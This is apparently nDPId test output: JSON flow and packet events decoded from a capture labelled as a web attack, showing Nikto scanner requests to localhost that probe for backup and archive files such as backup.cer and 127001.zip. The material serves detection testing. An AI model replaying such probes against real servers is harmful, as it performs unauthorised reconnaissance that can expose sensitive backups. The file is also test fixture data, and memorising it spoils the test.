+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 